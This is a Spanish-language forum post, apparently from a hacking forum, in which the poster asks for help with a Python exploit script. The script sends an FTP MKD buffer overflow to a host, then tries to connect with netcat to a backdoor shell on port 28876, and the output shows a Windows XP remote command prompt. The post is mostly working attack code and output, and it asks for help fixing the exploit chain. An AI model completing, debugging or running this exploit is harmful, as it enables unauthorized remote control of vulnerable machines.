Esto funciona.
Código:
#!/usr/bin/python
import os
os.system("nc 192.168.0.4 28876 -vvv")
pero quiero meterlo despues de un exploit y el codigo no llega a ejecutarse
Código:
#!/usr/bin/python
import socket
import sys
import os
[...]
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.4',21))
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('MKD ' + buf + '\r\n')
print "[*] Sending BufferOverflow..."
print "[*]" , (len(buf)) , "bytes Evil code"
print "[*] Starting connection backdoor port 28876"
s.recv(1024)
s.send('QUIT\r\n')
s.close()
sleep(5)
print "[*] Spawning Shell"
os.system("nc 192.168.0.4 28876 -vvv")
cuando lo ejecuto en la consola hace su cometido, pero no llega a la parte final.
Código:
[*] Sending BufferOverflow...
[*] 1017 bytes Evil code
[*] Starting connection backdoor port 28876
Por lo que en otra ventana he de ir y arrancar netcat
Código:
root@bt:~/Desktop# nc 192.168.0.4 28876
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\>
Me hechais un cablecillo??